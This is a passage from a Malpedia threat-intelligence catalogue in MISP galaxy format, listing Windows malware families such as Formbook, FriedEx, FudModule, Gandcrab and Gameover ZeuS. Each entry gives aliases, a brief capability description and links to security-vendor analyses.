https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://web.archive.org/web/20221115161556/https://blog.codsec.com/posts/malware/gracewire_adventure/

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://intel471.com/blog/a-brief-history-of-ta505

FlexiSpy (Windows)

The tag is: misp-galaxy:malpedia="FlexiSpy (Windows)"

FlexiSpy (Windows) is also known as:

Table 3510. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy

https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

Flusihoc

Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.

The tag is: misp-galaxy:malpedia="Flusihoc"

Flusihoc is also known as:

Table 3515. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc

https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/

FlyingDutchman

The tag is: misp-galaxy:malpedia="FlyingDutchman"

FlyingDutchman is also known as:

Table 3516. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman

https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

Formbook

FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.

The tag is: misp-galaxy:malpedia="Formbook"

Formbook is also known as:

  • win.xloader

Table 3521. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware

https://asec.ahnlab.com/en/32149/

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/FormBook/FormBook.md

https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/

https://www.malware-traffic-analysis.net/2023/06/05/index.html

https://youtu.be/aQwnHIlGSBM

https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/

https://blog.talosintelligence.com/2018/06/my-little-formbook.html

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://isc.sans.edu/diary/26806

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html

https://cert.gov.ua/article/955924

https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/

https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii

https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/

https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/

https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html

https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/

https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html

https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html

https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/

https://link.medium.com/uaBiIXgUU8

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://usualsuspect.re/article/formbook-hiding-in-plain-sight

https://www.connectwise.com/resources/formbook-remcos-rat

https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I

https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://www.zscaler.com/blogs/security-research/technical-analysis-xloaders-code-obfuscation-version-43

https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/

http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer

http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/

https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails

https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent

https://blog.netlab.360.com/purecrypter

https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/

FortuneCrypt

The tag is: misp-galaxy:malpedia="FortuneCrypt"

FortuneCrypt is also known as:

Table 3523. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt

https://securelist.com/ransomware-two-pieces-of-good-news/93355/

FRat

A RAT employing Node.js, Sails, and Socket.IO to collect information on a target.

The tag is: misp-galaxy:malpedia="FRat"

FRat is also known as:

Table 3525. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.frat

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md

FriedEx

The tag is: misp-galaxy:malpedia="FriedEx"

FriedEx is also known as:

  • BitPaymer

  • DoppelPaymer

  • IEncrypt

Table 3527. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.secureworks.com/research/threat-profiles/gold-drake

https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://sites.temple.edu/care/ci-rw-attacks/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/

FudModule

FudModule is a user-mode DLL that gains the ability to read and write arbitrary kernel memory via the BYOVD (Bring Your Own Vulnerable Driver) technique. Its main goal is to turn off Windows system monitoring features, which is done by modifying kernel variables and removing kernel callbacks. Its actions are very likely to affect various types of security products, e.g. EDRs, firewalls, antimalware and even digital forensics tools.

The tag is: misp-galaxy:malpedia="FudModule"

FudModule is also known as:

  • LIGHTSHOW

Table 3528. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule

https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/

https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/

https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf

https://www.mandiant.com/resources/blog/lightshift-and-lightshow

https://asec.ahnlab.com/ko/40495/

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf

win.fujinama

Fujinama is a custom VB info stealer capable of executing custom commands and custom exfiltration, keylogging and taking screenshots. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.

The tag is: misp-galaxy:malpedia="win.fujinama"

win.fujinama is also known as:

Table 3529. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fujinama

https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa

Furtim

The tag is: misp-galaxy:malpedia="Furtim"

Furtim is also known as:

Table 3532. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim

https://sentinelone.com/blogs/sfg-furtims-parent/

FusionDrive

The tag is: misp-galaxy:malpedia="FusionDrive"

FusionDrive is also known as:

Table 3533. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive

https://www.youtube.com/watch?v=_qdCGgQlHJE

FuwuqiDrama

FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.

It contains two distinguishing hardcoded lists.

The first is a list of ~50 video files of South Korean TV series, with their titles translated to Mandarin Chinese but encoded in the form of Pinyin romanization. That means the sounds are spelled in the Latin alphabet without tone marks; for example, meiyounihuobuxiaqu.avi represents Can’t Live Without You (a K-drama from 2012) and wulalafufu.avi translates to Ohlala Couple (also from 2012).

The second is a list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.

FuwuqiDrama stores its configuration in the INI file data\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi – the romanized Chinese word for server.

The tag is: misp-galaxy:malpedia="FuwuqiDrama"

FuwuqiDrama is also known as:

Table 3534. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

FuxSocy

FuxSocy has some similarities to win.cerber but is tracked as its own family for now.

The tag is: misp-galaxy:malpedia="FuxSocy"

FuxSocy is also known as:

Table 3535. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy

https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/

http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html

Gacrux

The tag is: misp-galaxy:malpedia="Gacrux"

Gacrux is also known as:

Table 3536. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux

https://krabsonsecurity.com/2020/10/24/gacrux-a-basic-c-malware-with-a-custom-pe-loader/

GalaxyLoader

GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.

It seems to make use of iplogger.com for tracking. It employed WMI to query the system with the following:

  • IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

  • IWbemServices::ExecQuery - select * from Win32_VideoController

  • IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct

The tag is: misp-galaxy:malpedia="GalaxyLoader"

GalaxyLoader is also known as:

Table 3537. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader

gamapos

The tag is: misp-galaxy:malpedia="gamapos"

gamapos is also known as:

  • pios

Table 3538. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos

http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf

Gameover DGA

The tag is: misp-galaxy:malpedia="Gameover DGA"

Gameover DGA is also known as:

Table 3539. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga

Gameover P2P

Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.

The tag is: misp-galaxy:malpedia="Gameover P2P"

Gameover P2P is also known as:

  • GOZ

  • Mapp

  • ZeuS P2P

Table 3540. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p

https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf

https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware

https://www.wired.com/2017/03/russian-hacker-spy-botnet/

https://www.wired.com/?p=2171700

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf

https://www.lawfareblog.com/what-point-these-nation-state-indictments

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://bin.re/blog/three-variants-of-murofets-dga/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware

http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf

https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state

https://nbviewer.org/github/tildedennis/zeusmuseum/blob/master/jupyter_notebooks/gameover/2014-05-28/Gameover%20version%202014-05-28.ipynb

Gamotrol

The tag is: misp-galaxy:malpedia="Gamotrol"

Gamotrol is also known as:

Table 3542. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol

Gandcrab

GandCrab was a Ransomware-as-a-Service (RaaS) that emerged on January 28, 2018, run by a criminal organization known for being confident and vocal while operating a rapidly evolving ransomware campaign. Through aggressive, if unusual, marketing and constant recruitment of affiliates, the operators were able to distribute a high volume of their malware globally.

In a surprising announcement on May 31, 2019, GandCrab’s operators posted on a dark web forum that they were ending a little more than a year of ransomware operations, citing staggering profit figures. If one thing sets these threat actors apart from other groups, it is their unpredictability, so there is always the possibility that they will resurface in one form or another.

The tag is: misp-galaxy:malpedia="Gandcrab"

Gandcrab is also known as:

  • GrandCrab

Table 3543. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

http://asec.ahnlab.com/1145

https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html

http://www.secureworks.com/research/threat-profiles/gold-garden

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/

https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://unit42.paloaltonetworks.com/revil-threat-actors/

https://vimeo.com/449849549

https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/

https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/

https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/

https://isc.sans.edu/diary/23417

https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/

https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel

https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html

https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/

https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/

https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom

https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights

https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html

https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/

https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/

https://www.secureworks.com/research/threat-profiles/gold-garden

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/

https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://asec.ahnlab.com/en/41450/

https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/

https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://intel471.com/blog/a-brief-history-of-ta505

Gasket

A backdoor used by the Mespinoza ransomware gang to maintain access to a compromised network.

The tag is: misp-galaxy:malpedia="Gasket"

Gasket is also known as:

Table 3544. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gasket

https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/

Gaudox

Gaudox is an HTTP loader written in C/C++. Its author claims to have put much effort into making the bot efficient and stable. Its rootkit functionality hides it inside Windows Explorer (32-bit only).

The tag is: misp-galaxy:malpedia="Gaudox"

Gaudox is also known as:

Table 3545. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox

http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html

Gdrive

According to Unit 42, this is a 64-bit .NET malware capable of interacting with Google Drive, allowing an attacker to have victim information uploaded and payloads delivered through the service.

The tag is: misp-galaxy:malpedia="Gdrive"

Gdrive is also known as:

  • DoomDrive

  • GoogleDriveSucks

Table 3550. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gdrive

https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/

https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf

GearInformer

The tag is: misp-galaxy:malpedia="GearInformer"

GearInformer is also known as:

Table 3551. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer

https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html

GEARSHIFT

According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.

The tag is: misp-galaxy:malpedia="GEARSHIFT"

GEARSHIFT is also known as:

Table 3552. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift

https://content.fireeye.com/apt-41/rpt-apt41/

GEMCUTTER

According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key. GEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn’t exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.

The tag is: misp-galaxy:malpedia="GEMCUTTER"

GEMCUTTER is also known as:

Table 3553. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

GeminiDuke

The tag is: misp-galaxy:malpedia="GeminiDuke"

GeminiDuke is also known as:

Table 3554. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke

https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf

Get2

The tag is: misp-galaxy:malpedia="Get2"

Get2 is also known as:

  • FRIENDSPEAK

  • GetandGo

Table 3555. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.get2

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://github.com/Tera0017/TAFOF-Unpacker

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.goggleheadedhacker.com/blog/post/13

https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://intel471.com/blog/ta505-get2-loader-malware-december-2020/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/

https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824

https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/

https://intel471.com/blog/a-brief-history-of-ta505

get_pwd

The tag is: misp-galaxy:malpedia="get_pwd"

get_pwd is also known as:

Table 3558. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd

https://ihonker.org/thread-1504-1-1.html

Gh0stBins

The tag is: misp-galaxy:malpedia="Gh0stBins"

Gh0stBins is also known as:

  • Gh0stBins RAT

Table 3559. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0stbins

https://any.run/cybersecurity-blog/gh0stbins-chinese-rat-malware-analysis/

Gh0stTimes

Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.

The tag is: misp-galaxy:malpedia="Gh0stTimes"

Gh0stTimes is also known as:

Table 3560. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes

https://jp.security.ntt/resources/EN-BlackTech_2021.pdf

https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html

https://www.youtube.com/watch?v=uakw2HMGZ-I

GHAMBAR

According to Mandiant, GHAMBAR is a remote administration tool (RAT) that communicates with its C2 server using SOAP requests over HTTP. Its capabilities include filesystem manipulation, file upload and download, shell command execution, keylogging, screen capture, clipboard monitoring, and additional plugin execution.

The tag is: misp-galaxy:malpedia="GHAMBAR"

GHAMBAR is also known as:

